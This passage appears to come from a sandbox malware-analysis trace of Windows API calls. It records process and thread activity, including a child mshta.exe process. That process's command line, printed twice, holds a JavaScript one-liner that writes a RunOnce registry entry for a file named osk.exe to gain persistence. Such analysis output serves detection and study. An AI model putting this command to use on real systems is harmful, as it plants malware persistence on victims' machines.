(hModule=0x76e40000, lpProcName=0xc9) returned 0x76e44af8 [0077.186] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.186] IInternetSession:UnregisterNameSpace (This=0x43f548, pCF=0x75028c50, pszProtocol="res") returned 0x0 [0077.187] IUnknown:Release (This=0x75028c50) returned 0x1 [0077.187] IInternetSession:UnregisterNameSpace (This=0x43f548, pCF=0x75028c70, pszProtocol="about") returned 0x0 [0077.187] IUnknown:Release (This=0x75028c70) returned 0x1 [0077.187] IUnknown:Release (This=0x43f548) returned 0x1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4336d8 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x451830 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4242a8 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43fa28 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4518a8 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d1e0 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x424888 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44f3c0 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4513a8 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4248b8 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x424a98 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44f060 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43fa40 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x446dc8 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: 
hHeap=0x410000, dwFlags=0x0, lpMem=0x43f998 | out: hHeap=0x410000) returned 1 [0077.187] IUnknown:Release (This=0x446e80) returned 0x0 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x442f00 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f860 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3c8 | out: hHeap=0x410000) returned 1 [0077.187] DeleteDC (hdc=0x100109d1) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4442f0 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x444288 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429270 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x444620 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x444360 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4292c0 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x459d10 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429220 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429310 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461740 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429360 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: 
hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429400 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429450 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x444818 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x444780 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x444718 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4443c8 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4293b0 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44e610 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44e5b8 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44ddb0 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44d5a8 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44d518 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43ba20 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472258 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, 
dwFlags=0x0, lpMem=0x4334b8 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43abd0 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4291d0 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45f2a8 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45f2f0 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x476e48 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ccb8 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45f338 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f830 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f848 | out: hHeap=0x410000) returned 1 [0077.189] GetCurrentThreadId () returned 0x90 [0077.189] DestroyWindow (hWnd=0x202ae) returned 1 [0077.189] NtdllDefWindowProc_W () returned 0x0 [0077.278] NtdllDefWindowProc_W () returned 0x0 [0077.278] NtdllDefWindowProc_W () returned 0x0 [0077.278] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.278] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f2d8 | out: hHeap=0x410000) returned 1 [0077.278] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d808 | out: hHeap=0x410000) returned 1 [0077.278] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.278] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.278] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: 
hHeap=0x410000) returned 1 [0077.279] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f920 | out: hHeap=0x410000) returned 1 [0077.279] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.279] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x442b48 | out: hHeap=0x410000) returned 1 [0077.279] SetEvent (hEvent=0x150) returned 1 [0077.280] GetCurrentThreadId () returned 0x90 [0077.280] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1388) returned 0x0 [0077.280] GetExitCodeThread (in: hThread=0x12c, lpExitCode=0x2cfa04 | out: lpExitCode=0x2cfa04) returned 1 [0077.281] CActiveIMMAppEx_Trident:IUnknown:Release (This=0x445c90) returned 0x0 [0077.281] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.281] ReleaseActCtx (in: hActCtx=0x43e47c | out: hActCtx=0x43e47c) [0077.281] FreeLibrary (hLibModule=0x73710000) returned 1 [0077.281] FreeLibrary (hLibModule=0x73710000) returned 1 [0077.699] UnregisterClassW (lpClassName=0xc168, hInstance=0x74af0000) returned 1 [0077.699] UnregisterClassW (lpClassName=0xc16a, hInstance=0x74af0000) returned 1 [0077.699] OleUninitialize () [0077.699] DestroyWindow (hWnd=0x4015e) returned 1 [0077.699] NtdllDefWindowProc_W () returned 0x0 [0077.700] PostQuitMessage (nExitCode=0) [0077.701] DllCanUnloadNow () returned 0x1 [0077.701] DllCanUnloadNow () returned 0x1 [0078.038] GetProcAddress (hModule=0x77710000, lpProcName="UnregisterTraceGuids") returned 0x77c99286 [0078.038] EtwUnregisterTraceGuids () returned 0x0 [0078.038] GetProcAddress (hModule=0x77710000, lpProcName="UnregisterTraceGuids") returned 0x77c99286 [0078.038] EtwUnregisterTraceGuids () returned 0x0 [0078.038] ??3@YAXPAX@Z () returned 0x1 [0078.038] free (_Block=0x58d990) [0078.043] NtdllDefWindowProc_W () returned 0x0 [0078.043] FreeLibrary (hLibModule=0x74af0000) returned 1 [0078.043] GetCurrentThreadId () returned 0x90 [0078.043] HeapFree (in: hHeap=0x410000, dwFlags=0x0, 
lpMem=0x4334d8 | out: hHeap=0x410000) returned 1 [0078.043] DeleteObject (ho=0x80a0a6b) returned 1 [0078.043] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47dc30 | out: hHeap=0x410000) returned 1 [0078.043] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a5d0 | out: hHeap=0x410000) returned 1 [0078.043] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47e040 | out: hHeap=0x410000) returned 1 [0078.044] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47deb8 | out: hHeap=0x410000) returned 1 [0078.044] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d470 | out: hHeap=0x410000) returned 1 [0078.044] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42f490 | out: hHeap=0x410000) returned 1 [0078.044] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d210 | out: hHeap=0x410000) returned 1 [0078.044] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x445998 | out: hHeap=0x410000) returned 1 [0078.044] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44c930 | out: hHeap=0x410000) returned 1 [0078.044] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.044] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.044] DeleteObject (ho=0xe080283) returned 1 [0078.044] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d240 | out: hHeap=0x410000) returned 1 [0078.044] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d1b0 | out: hHeap=0x410000) returned 1 [0078.045] EtwUnregisterTraceGuids () returned 0x0 [0078.045] EtwUnregisterTraceGuids () returned 0x0 [0078.045] EtwEventUnregister () returned 0x0 [0078.045] EtwEventUnregister () returned 0x0 [0078.045] CloseHandle (hObject=0xbc) returned 1 [0078.045] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0078.045] CloseHandle (hObject=0xc0) returned 1 [0078.045] LocalFree (hMem=0x42ea38) returned 0x0 [0078.045] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.045] HeapFree 
(in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.045] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.045] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.045] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.045] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.045] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.045] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x435358 | out: hHeap=0x410000) returned 1 [0078.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42e830 | out: hHeap=0x410000) returned 1 [0078.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x423de0 | out: hHeap=0x410000) returned 1 [0078.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42ea78 | out: hHeap=0x410000) returned 1 [0078.046] FreeLibrary (hLibModule=0x76e40000) returned 1 [0078.046] FreeLibrary (hLibModule=0x75300000) returned 1 [0078.046] free (_Block=0x582640) [0078.064] GetModuleHandleA (lpModuleName="mscoree.dll") returned 0x0 [0078.064] ExitProcess (uExitCode=0x0) Thread: id = 20 os_tid = 0x8fc Thread: id = 23 os_tid = 0x94c [0067.789] 
GetCurrentThreadId () returned 0x94c [0067.790] LoadLibraryW (lpLibFileName="mshtml.dll") returned 0x74af0000 [0067.790] CoInitialize (pvReserved=0x0) returned 0x0 [0067.790] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x927c0) returned 0x0 [0074.814] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1006) returned 0x4790c0 [0074.814] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4613b0 [0074.814] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x16) returned 0x46fdc8 [0074.815] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x4790c0, cbMultiByte=8, lpWideCharStr=0x46fdcc, cchWideChar=8 | out: lpWideCharStr="4475597") returned 8 [0074.815] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x108) returned 0x47a0d0 [0074.815] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x927c0) returned 0x0 [0074.816] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x927c0) returned 0x0 [0077.279] CoUninitialize () [0077.279] FreeLibraryAndExitThread (hLibModule=0x74af0000, dwExitCode=0x0) [0077.280] GetCurrentThreadId () returned 0x94c Thread: id = 26 os_tid = 0x97c [0069.264] GetCurrentThreadId () returned 0x97c Thread: id = 27 os_tid = 0x98c [0069.712] GetCurrentThreadId () returned 0x98c Thread: id = 28 os_tid = 0x99c [0069.712] GetCurrentThreadId () returned 0x99c Process: id = "7" image_name = "mshta.exe" filename = "c:\\windows\\syswow64\\mshta.exe" page_root = "0x4725f000" os_pid = "0x7bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x620" cmd_line = "mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" os_username = 
"XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 15 os_tid = 0x544 [0060.500] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x33f97c | out: lpSystemTimeAsFileTime=0x33f97c*(dwLowDateTime=0xee274da0, dwHighDateTime=0x1d61645)) [0060.500] GetCurrentProcessId () returned 0x7bc [0060.500] GetCurrentThreadId () returned 0x544 [0060.500] GetTickCount () returned 0x1147a3f [0060.500] QueryPerformanceCounter (in: lpPerformanceCount=0x33f974 | out: lpPerformanceCount=0x33f974*=18085484062) returned 1 [0060.500] GetModuleHandleA (lpModuleName=0x0) returned 0x970000 [0060.500] GetStartupInfoA (in: lpStartupInfo=0x33f888 | out: lpStartupInfo=0x33f888*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0060.500] GetVersionExA (in: lpVersionInformation=0x33f8d8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x33f8d8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0060.501] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x200000 [0060.501] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0060.501] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") 
returned 0x76d44f2b [0060.501] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0060.501] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0060.501] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0060.502] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.502] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.502] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.502] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.502] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.502] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.502] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.502] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.503] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.503] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.503] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.503] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.503] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.503] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.503] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.503] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.503] GetModuleHandleW (lpModuleName="kernelbase.dll") returned 0x76c10000 [0060.504] GetProcAddress (hModule=0x76c10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c2004f [0060.504] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.504] GetProcAddress 
(hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.583] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.583] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.583] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.583] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.583] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.583] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.584] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.584] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.584] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.584] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.584] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.584] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.584] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.584] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.585] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.585] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.585] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.585] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.585] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.585] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.585] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.585] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 
[0060.586] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.586] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.586] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.586] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.586] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.586] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.587] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x214) returned 0x2007d0 [0060.587] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.587] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.587] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.587] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.587] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.587] GetStartupInfoA (in: lpStartupInfo=0x33f80c | out: lpStartupInfo=0x33f80c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0060.587] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x480) returned 0x2009f0 [0060.587] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0060.587] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0060.587] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0060.588] SetHandleCount (uNumber=0x20) returned 0x20 [0060.588] GetCommandLineA () returned="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new 
ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"" [0060.588] GetEnvironmentStringsW () returned 0x7703b8* [0060.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0060.588] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x0, Size=0x565) returned 0x200e78 [0060.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x200e78, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0060.588] FreeEnvironmentStringsW (penv=0x7703b8) returned 1 [0060.588] GetLastError () returned 0x0 [0060.588] SetLastError (dwErrCode=0x0) [0060.588] GetLastError () returned 0x0 [0060.588] SetLastError (dwErrCode=0x0) [0060.588] GetLastError () returned 0x0 [0060.588] SetLastError (dwErrCode=0x0) [0060.588] GetACP () returned 0x4e4 [0060.589] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x0, Size=0x220) returned 0x2013e8 [0060.589] GetLastError () returned 0x0 [0060.589] SetLastError (dwErrCode=0x0) [0060.589] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x33f7e4 | out: lpCPInfo=0x33f7e4) returned 1 [0060.589] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x33f2b0 | out: lpCPInfo=0x33f2b0) returned 1 [0060.589] GetLastError () returned 0x0 [0060.589] SetLastError 